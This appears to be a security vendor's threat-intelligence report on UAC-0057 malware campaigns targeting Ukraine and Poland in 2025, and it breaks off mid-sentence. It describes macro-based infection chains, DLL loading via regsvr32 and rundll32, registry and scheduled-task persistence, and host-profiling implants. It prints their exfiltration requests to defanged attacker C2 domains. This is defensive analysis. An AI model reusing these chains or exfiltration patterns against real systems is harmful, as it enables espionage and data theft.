{ "id": "bb35c734-61c4-4ed8-aa24-e8aefdf2d4d9", "created_at": "2026-04-06T00:13:16.585251Z", "updated_at": "2026-04-10T03:35:10.600832Z", "deleted_at": null, "sha1_hash": "075c05d08e575ac604b3f9bd89a7c79d0989be72", "title": "UAC-0057 keeps applying pressure on Ukraine and Poland", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 4894766, "plain_text": "UAC-0057 keeps applying pressure on Ukraine and Poland\r\nPublished: 2025-08-20 · Archived: 2026-04-05 16:58:17 UTC\r\nPublished on 20 August, 2025 34min\r\nIdentifier: TRR250801.\r\nSummary\r\nIn late July, we identified two clusters of malicious archives that were leveraged to target Ukraine and Poland\r\nsince April 2025, and that we could link together from their similarities. Resulting infection chains are aimed at\r\ncollecting information about compromised systems and deploying implants for further exploitation. The toolset\r\nwe analyzed notably relies on readily available tools for obfuscation or packing purposes.\r\nWe noticed striking similarities with publicly reported activities that are associated with UAC-0057 (also known\r\nas UNC1151, FrostyNeighbor or Ghostwriter), a cyber espionage actor with reported ties to the Belarusian\r\ngovernment.\r\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nPage 1 of 20\n\nOur report analyses the identified infection chains including decoy content, malicious execution logic, system\r\ninformation discovery approaches, first stage implants workflows as well as associated infrastructure, and offers\r\nbaselines to detect and track the described activities. We also provide insights into the evolution of the threat\r\nactor’s toolset and practices, including the use of a cloud-hosted collaboration service for command and control\r\ncommunication, and the setup of the supporting infrastructure.\r\n📑\r\nBackground: Eastern European ghostwriters and cyber espionage\r\nInfection chains\r\nInfection chain which targeted Ukraine\r\nInfection chain which targeted Poland\r\nSimilarities across the different campaigns\r\nInfrastructure\r\nC2 domains\r\nC2 URLs and associated pictures\r\nSlack teams\r\nTargets\r\nAttribution: similarities with reported UAC-0057 activity\r\nConclusion: minor evolutions to disciplined targeting\r\nAppendix: indicators and detection rules\r\nIndicators of compromise (IOCs)\r\nYARA rules\r\nBackground: Eastern European ghostwriters and cyber espionage\r\nIn 2020, Mandiant published a report about an influence campaign dubbed “Ghostwriter” and aligned with Russia’s security\r\ninterests. Personas, some inauthentic, some impersonating real individuals such as journalists or academics, would post\r\nfalsified articles often containing anti-NATO narratives on compromised news websites. These narratives would also be\r\nrelayed through emails sent to media organisations or individuals, or on social media.\r\nIn April 2021, the cybersecurity company associated a state-sponsored cyber espionage threat actor they track as UNC1151\r\nto the influence activity of Ghostwriter, and later published a report on their high-confidence assessment that UNC1151 is\r\nlinked to the Belarusian government.\r\nSince then, reports from vendors and governmental organisations have referred to the threat actor behind seemingly related\r\nactivity as FrostyNeighbor, UAC-0057, also sometimes using the name of the influence campaign, Ghostwriter.\r\nLast year, the Ukrainian CERT (CERT-UA) reported a surge of activity of UAC-0057 during the summer of 2024. Early\r\n2025, SentinelOne published a blog post about a campaign targeting Ukrainian military and government organisations as\r\nwell as Belarusian government opposition that they attribute to Ghostwriter.\r\nInfection chains\r\nWe identified a cluster of compressed archive files which were likely intended to be delivered to Ukrainian targets between\r\nlate May 2025 and late July 2025. We could not determine how those archives were delivered, but we believe they were\r\ndistributed via spearphishing emails, either as attachments or through download links.\r\nThese archives contain XLS spreadsheets with a VBA macro that drops and loads a DLL. The latter is responsible for\r\ncollecting information about the compromised system and retrieving next stage malware from a command and control (C2)\r\nserver.\r\nOur analysis allowed us to identify other samples that we associate with the same threat actor, but which belong to a\r\ndifferent campaign targeting Poland.\r\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nPage 2 of 20\n\nIn the following sections, we describe the infection chains for both campaigns. For the purposes of clarity and conciseness,\r\nwe only provide details about chosen samples of each campaign.\r\nInfection chain which targeted Ukraine\r\nThe following 3 archives were uploaded on an online multiscanner service between June 12, 2025 and July 30, 2025.\r\nSHA-256 hash\r\nFilename (date of most recent content\r\nfile)\r\n5df1e1d67b92e2bba8641561af9967e3a54ec73600283c66b09c8165ddcb7de9\r\nСписок на перевірку 2025-2026\r\n(2).rar (2025-07-30)\r\n699c50014cdbe919855c25eb35b15dfc8e64f73945187da41d985a9d7be31a71\r\nПЛАН наповнення\r\nСФ_ЗМІНЕНИЙ.zip (2025-07-22)\r\n26ea842c4259c90349a1f4db92efa89ac4429a5ff380e7f72574426cfd647f1a N/A (2025-05-30)\r\nAll of these contain an XLS spreadsheet which embeds a VBA macro. Once executed, the macro drops a DLL which is\r\nloaded using regsvr32.exe . The exact execution logic differs depending on the archives creation date:\r\nFigure 1 – Infection chain for May archive\r\nFigure 2 – Infection chain for July archives\r\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nPage 3 of 20\n\nThe dropped DLL, which we will later refer to as the first stage implant, is written in C# and obfuscated using ConfuserEx.\r\nIt establishes persistence using the current user’s “Run” registry key, collects information about the compromised system,\r\nsends that information to the C2 server and periodically attempts to retrieve a next stage from the C2.\r\nDecoy documents\r\nOne of the aforementioned archives (SHA-256 26ea842c4259c90349a1f4db92efa89ac4429a5ff380e7f72574426cfd647f1a )\r\ncontains a 3 pages PDF document ( покрокова інструкція.pdf\r\n1\r\n), serving as a decoy.\r\nThis PDF document (see Fig. 3) was produced on May 30, 2025 according to the file’s metadata. It provides information for\r\ncompanies to benefit from certain services of the “Diia” (affiliated to the Ministry of Digital Transformation of Ukraine). We\r\ncould find the same content and formatting in a post from the Ministry of Digital Transformation of Ukraine that was\r\npublished on April 17, 2025 on the website of the Cabinet of Ministers of Ukraine (translated from “Кабінет Міністрів\r\nУкраїни”).\r\nFigure 3 – Decoy content from покрокова інструкція.pdf\r\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nPage 4 of 20\n\nThe XLS spreadsheet of that same archive ( роз'яснення.xls ) also displays decoy content (a likely list of contracts) once\r\nthe macro is executed:\r\nFigure 4 – Decoy content as displayed from роз’яснення.xls following macro execution\r\nXLS spreadsheets\r\nSHA-256 hash Filename\r\nf6fec3722a8c98c29c5de10969b8f70962dbb47ba53dcbcd4a3bbc63996d258d Список на перевірку 2025-2026.xls\r\n2\r\ndeaa3f807de097c3bfff37a41e97af5091b2df0e3a6d01a11a206732f9c6e49c\r\nПЛАН наповнення\r\nСФ_ЗМІНЕНИЙ.xls\r\n3\r\naac430127c438224ec61a6c02ea59eb3308eb54297daac985a7b26a75485e55f роз'яснення.xls\r\n4\r\nThe exact execution chain leading to the the DLL evolved between May and July, and is briefly described hereafter (see Fig.\r\n1 and 2 above).\r\nроз’яснення.xls\r\nUsing string concatenation, the VBA macro writes a DLL to %TEMP%\\DefenderProtectionScope.log and uses the\r\nShell.ShellExecute method to load it with regsvr32 /u /s %TEMP%\\DefenderProtectionScope.log .\r\nПЛАН наповнення СФ_ЗМІНЕНИЙ.xls\r\nIn this sample, the VBA macro decrypts the DLL and ultimately writes it to %LOCALAPPDATA%\\Serv\\0x00bac729fe.log . It\r\nthen creates an LNK file ( %APPDATA%\\Microsoft\\Windows\\Protection overview.lnk ) set to execute\r\nC:\\Windows\\System32\\regsvr32.exe /u /s \"%LOCALAPPDATA%\\Serv\\0x00bac729fe.log\" .\r\nContrary to the first sample, this VBA macro is partially obfuscated (strings remain in cleartext). The obfuscation is\r\nconsistent with the result of MacroPack (an offensive security tool which is available on GitHub) when executed with the -\r\n-obfuscate-names parameter.\r\nСписок на перевірку 2025-2026.xls\r\nThis sample does not directly drop a DLL, but first writes a Microsoft Cabinet (CAB) file to \"%TEMP%\\sdw9gobh0n\" .\r\nIn addition, it creates an LNK file ( %APPDATA%\\Microsoft\\Windows\\Protection overview past.lnk ) that uses expand.exe\r\nto extract the DLL from the CAB file to \"%LOCALAPPDATA%\\Logs\\sdw9gobh0n.log\" , where previous samples would either\r\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nPage 5 of 20\n\nload the DLL directly from a temporary directory where it had been dropped, or copy it to another directory (using the VBA\r\nmethod CopyFile() ).\r\nThe macro runs this first LNK file, and then creates a second one ( %APPDATA%\\Microsoft\\Windows\\Protection\r\noverview.lnk ) to load the extracted DLL via C:\\Windows\\System32\\regsvr32.exe with \" /u /s\r\n%LOCALAPPDATA%\\Logs\\sdw9gobh0n.log\" as arguments. The obfuscation in this sample is consistent with the use of\r\nMacroPack with all options for obfuscation being enabled, as strings are no longer in cleartext contrary to the previous\r\nsample.\r\nFirst stage C# DLL implants\r\nThe following samples are .NET DLL assemblies written in C# and obfuscated with ConfuserEx. They serve as downloaders\r\nfor an unidentified next stage, and have the ability to collect information about the compromised system.\r\nSHA-256 hash\r\nFilename (compilation\r\ntimestamp)\r\nParent XLS\r\nfilename\r\n707a24070bd99ba545a4b8bab6a056500763a1ce7289305654eaa3132c7cbd36\r\nDefenderProtectionScope.log\r\n(2025-05-29 11:37:46 UTC)\r\nроз'яснення.xls\r\n8a057d88a391a89489697634580e43dbb14ef8ab1720cb9971acc418b1a43564\r\n0x00bac729fe.log (2025-07-\r\n10 08:07:01 UTC)\r\nПЛАН наповненн\r\nСФ_ЗМІНЕНИЙ.xl\r\na2a2f0281eed6ec758130d2f2b2b5d4f578ac90605f7e16a07428316c9f6424e\r\nsdw9gobh0n.log (2025-07-29\r\n03:46:59 UTC)\r\nСписок на\r\nперевірку 2025-\r\n2026.xls\r\nVariant 1 ( DefenderProtectionScope.log )\r\nDefenderProtectionScope.log (internal name: InfoUploader.dll ) collects the following pieces of information about the\r\ncompromised system:\r\nOS platform identifier and version;\r\nhostname;\r\nCPU name (using a WMI query);\r\ncurrent user name;\r\noperating system install date (using a WMI query);\r\ndate at which the system was booted (with a bug 5);\r\ninstalled antivirus product name and installation date (using a WMI query);\r\ninformation about the IP address which is used to browse on the Internet (retrieved by sending an HTTP GET request\r\nto hxxps://ip-info.ff.avast[.]com/v1/info ).\r\nThis information is then sent as form data to hxxps://punandjokes[.]icu/cannabis-jokes.jpg (C2 server) via an HTTP\r\nPOST request:\r\nPOST /cannabis-jokes.jpg HTTP/1.0\r\nHost: punandjokes[.]icu\r\nConnection: close\r\nContent-Length: \u003ccalculated-content-length\u003e\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/53\r\noQlJbw=\u003cBase64-encoded-OS-platform-identifier-and-version\u003e\u0026NsAUjZ=\u003cBase64-encoded-hostname\u003e\u0026sCXaqf=\u003cBase64-encoded-CPU-nam\r\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nPage 6 of 20\n\nThe implant attempts to send the collected information to the C2 server every 10 minutes. Once sent, it then tries to\r\ndownload a next stage from the C2 server every 30 minutes. Upon successful retrieval (involving a check on the response\r\nsize to make sure that the data is larger than 220000 bytes), the next stage is written to\r\n%APPDATA%\\Microsoft\\System\\ProtectedCertSystem.dll , and run using the following command: rundll32\r\n%APPDATA%\\Microsoft\\System\\ProtectedCertSystem.dll,#1 .\r\nTo achieve persistence, the implant adds two entries to the current user’s “Run” registry key:\r\nFor the implant itself, it creates SytemProtectionService with the value: regsvr32 /u /s \u003ccurrent-implant-file-path\u003e ;\r\nFor the retrieved next stage, it creates MicrosoftDefender with the value: rundll32\r\n%APPDATA%\\Microsoft\\System\\ProtectedCertSystem.dll,#1 .\r\nVariant 2 ( sdw9gobh0n.log , 0x00bac729fe.log )\r\n0x00bac729fe.log (internal name: InfoUploader.dll ) and sdw9gobh0n.log (internal name: Downloader.dll ) share\r\nsimilar implementation and capabilities. Therefore, only details regarding the most recent sample, sdw9gobh0n.log , are\r\nprovided. Despite some differences in string encryption or hardcoded values, most of what is described hereafter also applies\r\nto 0x00bac729fe.log .\r\nTo persist, the implant adds an Audio Driver value to the user’s “Run” registry key with the command: regsvr32 /u /s\r\n\u003cimplant-current-file-path\u003e .\r\nIt then proceeds to collect the following information about the compromised system:\r\noperating system (and version if running on Windows);\r\nhostname;\r\ncurrent user name;\r\noperating system install date (using a WMI query);\r\ndate at which the system was booted (using a WMI query);\r\ninstalled antivirus product names, current states and install dates (using a WMI query);\r\ninformation about the IP address which is used to browse on the Internet (also retrieved using hxxps://ip-info.ff.avast[.]com/v1/info ).\r\nThis information is arranged in a JSON-formatted structure, Base64-encoded, and sent as a cookie ( mod0api ) value to the\r\nC2 server via an HTTP POST request: hxxps://sweetgeorgiayarns[.]online/wp-content/uploads/2025/04/06102226/Kims-hand-cards.jpg\r\nPOST /wp-content/uploads/2025/04/06102226/Kims-hand-cards.jpg HTTP/1.0\r\nHost: sweetgeorgiayarns[.]online\r\nConnection: close\r\nContent-Length: 0\r\nContent-Type: application/x-www-form-urlencoded\r\nCookie: mod0api=\u003cBase64-encoded-collected-information\u003e\r\nNote that the same User-Agent found in the previous samples is used in all web requests: Mozilla/5.0 (Windows NT 10.0;\r\nWin64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 .\r\nAfter a 10 minutes sleep, the implant enters an infinite loop to fetch payloads from the C2 server. The latter is expected to\r\nrespond with a Cookie header containing three values: a file path, an execution command, and a persistence flag. If the\r\nreceived file path is longer than five characters, the implant saves the payload to that path and runs it using the provided\r\ncommand (spawned via cmd.exe /c ). If the persistence flag is set, the implant creates a new entry in the current user’s\r\n“Run” registry key using the payload’s filename as value and the execution command as its data. The implant repeats this\r\nprocess every 30 minutes.\r\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nPage 7 of 20\n\nInfection chain which targeted Poland\r\nIn this section, we describe infection chains targeting Poland in April and May 2025.\r\nInfection files from April 2025\r\nWe identified the following 2 very similar archives as uploaded to an online multiscanner in April 2025 from Poland (see\r\nFig. 5).\r\nSHA-256 hash\r\nFilename (date of most recent content\r\nfile)\r\n730c1a02bb31d548d91ba23fce870b1dc53c4802ea4fcb0d293f96de670d74af ZGRW_nr_F00038524.zip (2025-04-21)\r\n57e0280dc5b769186588cc3a27a8a9be6f6e169551bbef39f95127e9326627f2 pks_250422325349_01.zip (2025-04-22)\r\nFigure 5 – Infection chain for April archives\r\nDecoy documents\r\nOne archive (SHA-256 43688170c27bcb2649360e48e08540c52a2d41ef55a84033e8516ce53921ede5 ) contains a one page PDF\r\ninvitation for the May 8, 2025, general assembly of the Union of Rural Municipalities of the Republic of Poland (translated\r\nfrom “Związek Gmin Wiejskich Rzeczypospolitej Polskiej”).\r\nWe found the same file available for download on the website of the union, indicating the threat actor repurposed an existing\r\nfile. According to the ZIP archive’s timestamps, this PDF was packaged alongside the XLS spreadsheet on April 21, 2025.\r\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nPage 8 of 20\n\nFigure 6 – Decoy content from 1_39ZO ZGWRP_zaproszenie.pdf\r\nXLS spreadsheets\r\nSHA-256 hash Filename\r\n082903a8bec2b0ef7c7df3e75871e70c996edcca70802d100c7f68414811c804 2_39ZO ZGWRP_program.xls\r\n69636ddc0b263c93f10b00000c230434febbd49ecdddf5af6448449ea3a85175 pks_250422325349_01.xls\r\nBoth samples contain a very similar VBA macro, obfuscated with MacroPack, that implements identical dropping and next\r\nstage loading processes. As an example, the VBA macro in 2_39ZO ZGWRP_program.xls :\r\nwrites a CAB file to %PROGRAMDATA%\\OfficeRuntimeBroker.xlam ;\r\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nPage 9 of 20\n\ncreates the OfficeRuntimeBroker.lnk file in %PROGRAMDATA% with C:\\Windows\\System32\\expand.exe as a target\r\nand the following arguments: %PROGRAMDATA%\\OfficeRuntimeBroker.xlam\r\n%PROGRAMDATA%\\~OfficeRuntimeBroker.dat ;\r\nruns the LNK file using rundll32.exe shell32.dll,ShellExec_RunDLL %PROGRAMDATA%\\OfficeRuntimeBroker.lnk\r\nto extract the content from the CAB file to %PROGRAMDATA%\\~OfficeRuntimeBroker.dat ;\r\nwrites a new LNK file to the same path as the previous one with C:\\Windows\\System32\\rundll32.exe as a target\r\nand the following arguments: %PROGRAMDATA%\\~OfficeRuntimeBroker.dat,TS_STATUS_INFO_get0_status ;\r\nruns the LNK file using rundll32.exe shell32.dll,ShellExec_RunDLL %PROGRAMDATA%\\OfficeRuntimeBroker.lnk\r\nto load the DLL.\r\nFirst stage C# DLL implants\r\nSHA-256 hash\r\nFilename (compilation\r\ntimestamp)\r\nParent XLS filename\r\n7c77d1ba7046a4b47aec8ec0f2a5f55c73073a026793ca986af22bbf38dc948c\r\n~OfficeRuntimeBroker.dat\r\n(2025-04-21 07:55:57 UTC)\r\n2_39ZO\r\nZGWRP_program.xls  \r\n559ee2fad8d16ecaa7be398022aa7aa1adbd8f8f882a34d934be9f90f6dcb90b\r\n~DF20BC61C6277A354A.dat\r\n(2025-04-22 12:55:16 UTC)\r\npks_250422325349_01\r\nThe dropped implants are C# .NET DLL assemblies, obfuscated with ConfuserEx and internally named jkyhrgkek30.dll .\r\nAlthough they export 50 functions named after the OpenSSL library, only TS_STATUS_INFO_get0_status contains\r\nfunctional code. Both samples share the same logic, differing only in their C2 parameters and hardcoded filenames.\r\nUpon execution, they collect the following information from the compromised system:\r\nOS platform identifier and version;\r\nhostname;\r\nCPU name (using a WMI query);\r\ncurrent user name;\r\noperating system install date (using a WMI query);\r\ndate at which the system was booted (with the same implementation bug5 than in a sample that targeted Ukraine);\r\ninformation about the IP address which is used to browse on the Internet (also retrieved using hxxps://ip-info.ff.avast[.]com/v1/info ).\r\nThis data is concatenated, RC4-encrypted with a 256 bytes key, and Base64-encoded prior to being sent to the C2 server\r\n(with + replaced with - , and / replaced with _ ). The same RC4 key is used in both samples. The information\r\ncollection implementation is similar to the one of the C# downloaders used in the campaign targeting Ukraine, even\r\nreplicating a bug5 that was not fixed before the latest samples of that same campaign.\r\nThese downloaders use Slack as a C2 server, leveraging the webhook mechanism to upload data. Once the data is uploaded,\r\nthey immediately attempt to download a next stage from a download URL ending with .jpg , before decrypting that next\r\nstage using RC4 and the same key used to encrypt the information collected on the system. Then, the downloaders write the\r\ndecrypted data to a file in C:\\ProgramData\\ (file path is hardcoded and differs between samples, example:\r\nC:\\ProgramData\\ssh\\ssh.pif.pif.pif ), and run the next stage using a WScript.Shell object instantiated via the COM\r\nAPI.\r\nThe following User-Agent is used for all web requests: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\r\n(KHTML, like Gecko) Chrome/88.0.4093.093 Safari/537.36\r\nThese downloaders do not implement any persistence mechanism, and the described logic is run only once.\r\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nPage 10 of 20\n\nAccording to sandbox reports from an online multiscanner, the next stage retrieved by one of these downloaders\r\n( ~OfficeRuntimeBroker.dat ) has communicated with the domain pesthacks[.]icu , which shares similarities with the\r\ndomains supporting other campaigns that we analyzed (see Infrastructure).\r\nInfection files from May 2025\r\nThe BHP.zip and Z-15a.rar archives were submitted to an online multiscanner on May 27 and May 26, 2025\r\nrespectively. They contain a single XLS spreadsheet named after the archive itself ( BHP.xls and Z-15a.xls , see Fig. 7).\r\nSHA-256 hash Filename (first seen)\r\n3fff6c8a8ef3f153ebbe6d469a0d970953358a25bb9b4955a2592626f011cbd6 Z-15a.rar (2025-05-26)\r\n6e562afa3193c2ca5d2982e04de78cf83faa203534a6098ab5f08df94bbeb944 BHP.zip (2025-05-27)\r\nFigure 7 – Infection chain for May archives\r\nXLS spreadsheet\r\nThe spreadsheet (SHA-256 06380c593d122fc4987e9d4559a9573a74803455809e89dd04d476870a427cbe ) is identical in both\r\narchives and has an obfuscated VBA macro that decrypts and drops a DLL to %LOCALAPPDATA%\\SDXHelp\\SDXHelp.dll . The\r\nDLL is then being loaded with rundll32 %LOCALAPPDATA%\\SDXHelp\\SDXHelp.dll,#1 via the ShellExecute function.\r\nFirst stage C++ DLL implant\r\nThe implant is a C++ DLL which has a single export named Start and has been packed with UPX.\r\nFilename SDXHelp.dll\r\nFile type 32-bit PE (DLL)\r\nCompilation timestamp 2025-05-26 11:27:40 UTC\r\nHash (SHA-256) 5fa19aa32776b6ab45a99a851746fbe189f7a668daf82f3965225c1a2f8b9d36\r\nUpon execution, it collects the following information about the host:\r\nhostname;\r\nCPU name;\r\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nPage 11 of 20\n\navailable memory;\r\nWindows build;\r\nOS install date (using a WMI query);\r\nsystem boot date;\r\nusername;\r\ninformation about the IP address which is used to browse on the Internet (also retrieved using hxxps://ip-info.ff.avast[.]com/v1/info );\r\nthe antivirus names and install dates (using a WMI query).\r\nThis information is Base64-encoded, arranged in a JSON structure ( {\"cookie\":\"\u003chost-information\u003e\"} ), and sent to\r\nhxxps://taskandpurpose[.]icu/hews/coast-guard-0reg0n-c0ncrete.jpg (C2 server) via an HTTP POST request as body:\r\nPOST /hews/coast-guard-0reg0n-c0ncrete.jpg HTTP/1.0\r\nHost: taskandpurpose[.]icu\r\nConnection: close\r\nContent-Length: \u003ccalculated-content-length\u003e\r\nContent-Type: application/json\r\nUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 18_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/133.0.\r\n{\"cookie\":\"\u003cBase64-encoded-collected-information\u003e\"}\r\nThe implant makes use of the TaskScheduler COM interface to achieve persistence by registering a scheduled task named\r\n\\UpdateSDX which runs the following command at user logon: C:\\Windows\\system32\\rundll32.exe\r\n%LOCALAPPDATA%\\SDXHelp\\SDXHelp.dll,#1 .\r\nEvery 20 minutes, the implant attempts to download a DLL from the C2 server by sending an HTTP GET request to the\r\nprevious URL. Upon successful retrieval, it decrypts it using a byte-wise XOR with a 128 bytes key, which is also used for\r\nthe decryption of the hardcoded strings.\r\nIf the retrieved file size is at least 356804 bytes, only the data after the first 356804 bytes is decrypted. A JPEG file (SHA-256 b39411abe494e2b04419a32c72fb1968ba745b3d7b04e9e8ebbab872df794b35 ) of this exact size, retrieved by an online\r\nmultiscanner from the C2 URL, suggests that the next stage would be appended to this image file and delivered to\r\ncompromised hosts which meet a certain set of requirements (an assessment likely based on the information collected on the\r\nhost).\r\nThe decrypted DLL is written to %LOCALAPPDATA%\\Runtime\\RuntimeBroker.dll . Then, the implant registers a scheduled\r\ntask named RuntimeBroker which loads the next stage using C:\\Windows\\system32\\rundll32.exe\r\n%LOCALAPPDATA%\\Runtime\\RuntimeBroker.dll,#1 , and launches an instance of this scheduled task before deleting it.\r\nIn all exchanges with the C2 server, the following User-Agent string is used: Mozilla/5.0 (iPhone; CPU iPhone OS 18_4_1\r\nlike Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/133.0.6943.84 Mobile/15E148 Safari/604.1 .\r\nNote that the User-Agent string set in requests to hxxps://ip-info.ff.avast[.]com/v1/info differs: Mozilla/5.0\r\n(Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.8761.1412\r\nSafari/537.36 .\r\nInfection chain variant leading to Cobalt Strike\r\nWe identified another XLS spreadsheet (SHA-256\r\n082877e6f8b28f6cf96d3498067b0c404351847444ebc9b886054f96d85d55d4 , named STAN NA ELEWATORZE 2024.xls\r\n6\r\n) which\r\nshares similarities with the previously described XLS files, and was submitted from Poland in May 14, 2025 on an online\r\nmultiscanner service.\r\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nPage 12 of 20\n\nThis file contains yet another instance of a MacroPack obfuscated VBA macro which aims to decrypt and write a DLL to\r\n%LOCALAPPDATA\\MSDE\\mrasp86.dll . It also creates an LNK file, %APPDATA%\\Microsoft\\Windows\\Protection overview.lnk ,\r\nwhich is run to load the DLL using C:\\Windows\\System32\\rundll32.exe \"%LOCALAPPDATA%\\MSDE\\mrasp86.dll\",#1 .\r\nWe notice that the path and file name of the LNK file ( %APPDATA%\\Microsoft\\Windows\\Protection overview.lnk ), as well\r\nas the loading process of the implant, are identical to what was observed in samples associated with the campaign targeting\r\nUkraine.\r\nThe dropped DLL (SHA-256 3b5980c758bd61abaa4422692620104a81eefbf151361a1d8afe8e89bf38579d , internal name:\r\nDiagnExp.dll ) is written in C++, has a single export, Start , and has been packed with UPX, similarly to the previously\r\ndescribed SDXHelp.dll sample (SHA-256 5fa19aa32776b6ab45a99a851746fbe189f7a668daf82f3965225c1a2f8b9d36 ). The\r\nimplant writes another DLL to %APPDATA%\\DiagnosticComponents\\DiagnosticComponents.dll and leverages the Task\r\nScheduler COM interface to register a scheduled task ( \\ExpDiagnosticDataSettings ) and to trigger the execution of\r\nDiagnosticComponents.dll .\r\nDiagnosticComponents.dll (SHA-256 c7e44bba26c9a57d8d0fa64a140d58f89d42fd95638b8e09bc0d2020424b640e , internal\r\nname: inj_p.dll ) also has a single export named Start , and acts as a loader for a Cobalt Strike Beacon, which\r\ncommunicates with the following C2 server: hxxps://medpagetoday[.]icu/nicheediting/trends . This sample was run in\r\npublic sandboxes, and as a result, the configuration of the Beacon is available online.\r\nSimilarities across the different campaigns\r\nDespite notable variations between the two described campaigns (e.g. C# downloaders only for Ukraine but C++\r\ndownloaders for Poland), our analysis reveals numerous overlaps:\r\nInitial access: consistent use of weaponized XLS spreadsheets with VBA macros, many of which appear to be\r\nobfuscated with MacroPack;\r\nExecution chains: similar execution flows, often leveraging LNK files to load dropped DLLs;\r\nCode and artifact reuse: identical code segments were found in the C# downloaders across the two campaigns.\r\nMoreover, specific file paths and names, such as %APPDATA%\\Microsoft\\Windows\\Protection overview.lnk , were\r\nreused;\r\nProfiling: Both campaigns used hxxps://ip-info.ff.avast[.]com/v1/info for external IP address discovery;\r\nInfrastructure: A similar C2 infrastructure setup was observed across both campaigns.\r\nInfrastructure\r\nC2 domains\r\nThe threat actor demonstrates consistency in the setup of the supporting infrastructure for the campaigns described in this\r\nreport. The following table lists the C2 domains used for both the campaign targeting Ukraine and the campaign targeting\r\nPoland, since April 2025. For each of these domains, the threat actor additionally leverages Cloudflare name servers and\r\nproxies.\r\nDomain\r\nRegistrar\r\n(registration date,\r\nregistrant mail\r\ndomain and country)\r\nTLS\r\nCertificate\r\nCA\r\nImpersonated domain\r\nEstimated\r\nOperation\r\nDate\r\npesthacks[.]icu\r\nPublicDomainRegistry\r\n(2025-03-04,\r\nproton.me US)\r\nGoogle\r\nTrust\r\nServices \r\npesthacks[.]com April 2025\r\nmedpagetoday[.]icu PublicDomainRegistry\r\n(2025-02-28,\r\nGoogle\r\nTrust\r\nmedpagetoday[.]com May 2025\r\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nPage 13 of 20\n\nDomain\r\nRegistrar\r\n(registration date,\r\nregistrant mail\r\ndomain and country)\r\nTLS\r\nCertificate\r\nCA\r\nImpersonated domain\r\nEstimated\r\nOperation\r\nDate\r\nproton.me US) Services\r\ntaskandpurpose[.]icu\r\nPublicDomainRegistry\r\n(2025-03-05,\r\nproton.me US)\r\nGoogle\r\nTrust\r\nServices\r\ntaskandpurpose[.]com May 2025\r\npunandjokes[.]icu\r\nPublicDomainRegistry\r\n(2025-03-05,\r\nproton.me US)\r\nGoogle\r\nTrust\r\nServices\r\npunandjokes[.]com\r\nMay/June\r\n2025\r\nkitchengardenseeds[.]icu\r\nPublicDomainRegistry\r\n(2025-03-10,\r\nproton.me US)\r\nGoogle\r\nTrust\r\nServices\r\nkitchengardenseeds[.]com July 2025\r\nsweetgeorgiayarns[.]online\r\nPublicDomainRegistry\r\n(2025-02-20,\r\nprotonmail.com US)\r\nGoogle\r\nTrust\r\nServices\r\nsweetgeorgiayarns[.]com\r\nJuly/August\r\n2025\r\nWe also noticed that the HTTPS root path for one C2 domain ( sweetgeorgiayarns[.]online ) redirected to the seemingly\r\nlegitimate and unrelated curseforge[.]com website (which distributes video game mods) between 2025-07-26 and 2025-\r\n07-30, when the domain was a C2 server for a C# downloader that targeted Ukraine. It is unclear if this redirection to an\r\nunrelated website is the result of a voluntary act. Such redirections might be setup to have the domain miscategorized as a\r\ngaming website by web filtering services. In any case, we could determine that curseforge[.]icu also implements the\r\nsame redirection, appears to be an impersonation of curseforge[.]com , and is registered in the exact same way than the C2\r\ndomains we previously listed. As a result, we believe with low confidence that this domain might be leveraged by the threat\r\nactor, or a third party that supports the threat actor.\r\nDomain\r\nRegistrar (registration date, registrant mail\r\ndomain and country)\r\nTLS Certificate\r\nCA\r\nImpersonated\r\ndomain\r\ncurseforge[.]icu\r\nPublicDomainRegistry (2025-02-05, proton.me\r\nUS)\r\nGoogle Trust\r\nServices \r\ncurseforge[.]com\r\nC2 URLs and associated pictures\r\nIn some instances, C2 URLs are identical or very similar to URLs of legitimate websites associated with the impersonated\r\ndomains listed above. For example, the C2 URL of the most recent C# downloader we observed (SHA-256\r\na2a2f0281eed6ec758130d2f2b2b5d4f578ac90605f7e16a07428316c9f6424e ) is the following:\r\nhxxps://sweetgeorgiayarns[.]online/wp-content/uploads/2025/04/06102226/Kims-hand-cards.jpg .\r\nAccording to the results of an online multiscanner service, a JPEG image file showing the following picture (SHA-256\r\n34f97d0bd753d534d376725553b31de9860c2c96c96202a139281c6fa2bc85ee ) has been served from this C2 URL on July 30,\r\n2025:\r\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nPage 14 of 20\n\nFigure 8 – Reproduction of the original Kims-hand-cards.jpg image (the image file we included in this report\r\nis however not the original file)\r\nThis image file is identical to the one included on a post that was published on July 15, 2025 at\r\nhxxps://sweetgeorgiayarns[.]com/hand-cards-your-first-fibre-prep-tool/ , and served from the following 